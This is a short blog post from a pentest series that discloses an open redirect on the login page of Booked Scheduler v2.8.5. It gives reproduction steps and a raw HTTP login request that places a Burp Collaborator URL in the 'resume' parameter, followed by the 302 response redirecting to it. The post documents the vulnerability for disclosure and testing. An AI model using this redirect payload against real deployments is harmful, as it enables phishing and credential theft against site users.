Saturday, 19 October 2024

Friday Fun Pentest Series - 12 - Open Redirect - booked scheduler v2.8.5

 Description

- It was found that the application suffered from Open Redirect on the login page via the "resume" parameter


Open Redirect

Steps to Reproduce:

  1. Login and intercept HTTP request with a proxy such as Burpsuite or ZAP
  2. In the "resume" parameter add the redirect URL e.g. Burp Collab
  3. Forward the request


// HTTP POST login request

POST /Bookedbo8effotfu/Web/index.php HTTP/1.1
Host: localhost
Cookie: PHPSESSID=7c0a0ee0b401863e1a30acbebf301916; language=en_gb; fus_session=a15fcb9ef40abd1dece4c7fc35c2b58c; fus_visited=yes
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
[...]

email=admin&password=password&captcha=&login=submit&resume=https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com&language=en_gbg


// HTTP response

HTTP/1.1 302 Found
Date: Sat, 12 Oct 2024 12:09:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: https://urp4vilyopoly8dhq6xa2z8v0m6du3is.oastify.com
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Friday Fun Pentest Series - 15 - OOB XXE - fronsetiav1.1

Description - The application is vulnerable to OOB XXE injection XXE  #1 - " show_operations.jsp " Steps to Reproduce: Add Python3...